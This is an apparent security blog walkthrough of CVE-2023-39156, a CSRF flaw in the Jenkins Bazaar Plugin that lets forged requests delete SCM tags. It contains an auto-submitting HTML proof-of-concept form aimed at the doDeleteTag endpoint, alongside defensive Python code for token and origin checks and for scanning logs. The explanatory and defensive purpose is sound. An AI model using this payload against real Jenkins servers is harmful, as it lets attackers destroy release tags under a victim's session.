CVE-2023-39156 - How A CSRF Vulnerability in Jenkins Bazaar Plugin Let Attackers Delete SCM Tags

In June 2023, a cross-site request forgery (CSRF) vulnerability, tracked as CVE-2023-39156, was discovered in the Jenkins Bazaar Plugin. This bug, present in version 1.22 and earlier, left users exposed to a dangerous attack vector that could be leveraged to _delete previously created Bazaar SCM tags_ without authorization.

In this walkthrough we explain, in simple terms, what this vulnerability is and how it works, and show the shape of a request that exploits it so you understand why it matters. We also share references and ways to protect yourself.

What is the Jenkins Bazaar Plugin?

Jenkins is the famous automation server used for Continuous Integration/Continuous Deployment (CI/CD). To support different source code management (SCM) systems, Jenkins uses plugins. The Bazaar Plugin lets Jenkins interact with Bazaar, a distributed version control system.

Tagging in SCM is important: teams use tags to mark releases and important states. That’s why being able to delete tags is serious—it can disrupt code integrity, releases, or audits!

What is a CSRF Vulnerability?

A Cross-Site Request Forgery (CSRF) is when an attacker tricks a logged-in user’s browser into performing unwanted actions on a web application. Think of it like this: _you’re logged into Jenkins in tab 1, and in tab 2 you click on a hacker’s link. Suddenly, that hacker’s script runs actions in Jenkins, as if it were you!_

CSRF works when the web application does not enforce defenses such as CSRF tokens or strict checks on where a request came from.

- Risk: Attackers can cause data loss or sabotage by deleting tags you rely on.
- Exploitability: Remote (requires social engineering: a user must visit a malicious site while logged into Jenkins).
- Fixed In: Plugin version 1.23

The Root Cause

Certain HTTP endpoints used by the plugin failed to require CSRF tokens for deleting tags. This allowed requests from _other origins_ (say, an attacker's website) to trigger those actions, provided the victim was logged in.
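To make the two previous points concrete, here is an added example (not code from the original article or from the Jenkins Bazaar Plugin) that models in plain Python what a state-changing endpoint such as the tag-deletion handler has to check so that a forged cross-site POST is refused: a per-session CSRF token compared in constant time, plus a check of the browser-supplied Origin (or Referer) header. The handler names, the endpoint path and the `http://jenkins.internal` origin are assumptions taken from the article's own example; the plugin's real internals are not reproduced. The "unprotected" handler only models the article's description of the pre-fix behaviour, where a valid session cookie was the only thing checked.

```python
# Added example (not code from the original article or from the Jenkins
# Bazaar Plugin): a model of the server-side checks that stop a CSRF.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import urlsplit

# Assumed deployment origin and endpoint path, matching the article's example.
JENKINS_ORIGIN = "http://jenkins.internal"
DELETE_TAG_PATH = "/job/YOUR_JOB/bazaar/doDeleteTag"


@dataclass
class Session:
    """A logged-in user; the CSRF token is minted once per session."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]
    form: Dict[str, str]
    # The session the browser's cookie resolves to. In a CSRF attack this is
    # the victim's own session, because the browser sends the cookie automatically.
    session: Optional[Session]


class TagStore:
    def __init__(self, tags):
        self.tags = set(tags)


def origin_allowed(headers: Dict[str, str]) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is our own site."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # fail closed: no evidence of where the POST came from
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == JENKINS_ORIGIN


def token_valid(request: Request) -> bool:
    """Synchronizer token pattern: the form must carry the session's own token."""
    if request.session is None:
        return False
    submitted = request.form.get("csrf_token", "")
    return hmac.compare_digest(submitted.encode(), request.session.csrf_token.encode())


def delete_tag_unprotected(store: TagStore, request: Request) -> int:
    """Models the pre-fix behaviour the article describes: a valid session
    is the only thing checked, so a forged POST succeeds."""
    if request.method != "POST" or request.path != DELETE_TAG_PATH or request.session is None:
        return 403
    store.tags.discard(request.form.get("tag", ""))
    return 200


def delete_tag_protected(store: TagStore, request: Request) -> int:
    """Same endpoint with CSRF defenses: token and origin must both check out."""
    if request.method != "POST" or request.path != DELETE_TAG_PATH or request.session is None:
        return 403
    if not token_valid(request) or not origin_allowed(request.headers):
        return 403
    store.tags.discard(request.form.get("tag", ""))
    return 200


def demo() -> Dict[str, object]:
    """Run a constructed forged request and a legitimate one against both handlers."""
    alice = Session("alice")
    # The attacker's page cannot read Alice's token, so the forged form lacks it,
    # and the browser reports the foreign Origin truthfully.
    forged = Request("POST", DELETE_TAG_PATH,
                     {"Origin": "http://third-party.example"},
                     {"tag": "v1.2.3"}, session=alice)
    legit = Request("POST", DELETE_TAG_PATH,
                    {"Origin": JENKINS_ORIGIN},
                    {"tag": "v1.2.4", "csrf_token": alice.csrf_token}, session=alice)
    vulnerable = TagStore(["v1.2.3", "v1.2.4"])
    fixed = TagStore(["v1.2.3", "v1.2.4"])
    return {
        "unprotected_forged_status": delete_tag_unprotected(vulnerable, forged),
        "unprotected_tags_left": sorted(vulnerable.tags),
        "protected_forged_status": delete_tag_protected(fixed, forged),
        "protected_legit_status": delete_tag_protected(fixed, legit),
        "protected_tags_left": sorted(fixed.tags),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the forged request deleting `v1.2.3` from the unprotected store (status 200) while the protected handler returns 403 and leaves the tag in place, yet still accepts Alice's own submission that carries her token. Both checks are kept because each covers a gap in the other: the token cannot be read cross-site, and the origin check still rejects a request even if a token somehow leaked.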

Step 1 — Set the Stage

Suppose Alice is a Jenkins admin. She has Jenkins open and is logged in. She visits an attacker’s webpage (maybe via a phishing email or malicious ad).

Step 2 — The Attack

The attacker's webpage sends a crafted POST request to the specific URL Jenkins uses to handle tag deletions.

Example Exploit Code (HTML)

<html>
  <body>
    <!-- A hidden form aimed at the tag-deletion endpoint. The victim's browser
         attaches their Jenkins session cookie to the POST automatically. -->
    <form action="http://jenkins.internal/job/YOUR_JOB/bazaar/doDeleteTag" method="POST">
      <input type="hidden" name="tag" value="v1.2.3">
      <input type="submit" value="Click me!" />
    </form>
    <script>
      // auto-submits the first (and only) form, so the logged-in user never has to click
      document.forms[0].submit();
    </script>
  </body>
</html>

Original References

- Official Jenkins Security Advisory - 2023-06-14
- Jenkins Bazaar Plugin page
- Bazaar VCS Documentation

How To Stay Safe

- Upgrade: Update the Bazaar Plugin to version 1.23 or later. This update adds CSRF protection.
- Restrict Access: Don't expose the Jenkins web UI to the internet. Use firewalls and a VPN.
- Educate Users: Remind them about the dangers of phishing and visiting untrusted links while logged in to sensitive systems.
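Patching closes the hole going forward, but the conclusion's advice to check your audit logs needs a concrete check. The following is an added example (not code from the original article or from the Jenkins project) that reviews a web access log for POSTs to the tag-deletion endpoint named above and flags those whose Referer is not the Jenkins site itself, or is missing, which is how a cross-site forged submission would typically appear. The NCSA combined log format, the `jenkins.internal` host and every sample line are constructed for the example; adapt the regular expression to whatever your servlet container or reverse proxy actually writes.

```python
# Added example (not code from the original article or from Jenkins): review
# an access log for tag-deletion POSTs that did not come from our own UI.
import re
from typing import Dict, List
from urllib.parse import urlsplit

JENKINS_HOST = "jenkins.internal"          # assumed, from the article's example URL
DELETE_TAG_SUFFIX = "/bazaar/doDeleteTag"  # endpoint path used in the article

# NCSA combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines: a normal UI deletion, a cross-site forged POST,
# a POST with no Referer at all, and an unrelated GET.
SAMPLE_LOG = """\
10.0.0.12 - alice [14/Jun/2023:09:58:02 +0000] "POST /job/YOUR_JOB/bazaar/doDeleteTag HTTP/1.1" 200 0 "http://jenkins.internal/job/YOUR_JOB/bazaar/tags" "Mozilla/5.0"
10.0.0.12 - alice [14/Jun/2023:10:03:11 +0000] "POST /job/YOUR_JOB/bazaar/doDeleteTag HTTP/1.1" 200 0 "http://third-party.example/promo.html" "Mozilla/5.0"
10.0.0.40 - bob [14/Jun/2023:10:05:47 +0000] "POST /job/YOUR_JOB/bazaar/doDeleteTag HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.12 - alice [14/Jun/2023:10:06:00 +0000] "GET /job/YOUR_JOB/ HTTP/1.1" 200 5120 "http://jenkins.internal/" "Mozilla/5.0"
"""


def referer_host(referer: str) -> str:
    """Return the host part of a Referer value, or '' when it is absent ('-')."""
    if referer in ("", "-"):
        return ""
    return urlsplit(referer).hostname or ""


def find_suspicious_tag_deletions(log_text: str) -> List[Dict[str, str]]:
    """Flag tag-deletion POSTs that did not originate from a page on the Jenkins site."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real tool would count and report these
        if m["method"] != "POST" or not m["path"].endswith(DELETE_TAG_SUFFIX):
            continue
        host = referer_host(m["referer"])
        if host == JENKINS_HOST:
            continue  # submitted from our own UI
        findings.append({
            "time": m["time"],
            "user": m["user"],
            "ip": m["ip"],
            "status": m["status"],
            "reason": "no Referer" if host == "" else f"cross-site Referer {host}",
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_tag_deletions(SAMPLE_LOG):
        print(f"{f['time']} user={f['user']} ip={f['ip']} status={f['status']}: {f['reason']}")
```

On the sample log this reports two lines: Alice's deletion with a third-party Referer and Bob's with none. A forged deletion returns 200 just like a legitimate one, which is why the Referer, not the status, is the discriminator. Two caveats apply: referrer policies can legitimately suppress the header, so a missing Referer is a lead to follow up with the user rather than proof, and the access log does not record which tag was removed, so confirm the damage against the Bazaar repository itself.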

Conclusion

CVE-2023-39156 is a classic reminder that CSRF bugs can have _real_ consequences, especially in platforms like Jenkins that manage your source code. Attackers can do nasty things with very little effort, and because the forged request is sent by the victim's own browser under the victim's own session, the audit trail points at the victim, so it might not even be obvious who was responsible.

If you use the Bazaar Plugin, update now and check your audit logs. Always watch plugin security advisories and keep both your software and your security awareness current.

Extra Resources

- Learn about CSRF (OWASP)
- Jenkins Security Best Practices
- What’s Bazaar SCM?

Timeline

Published on: 07/26/2023 14:15:00 UTC
Last modified on: 08/01/2023 20:31:00 UTC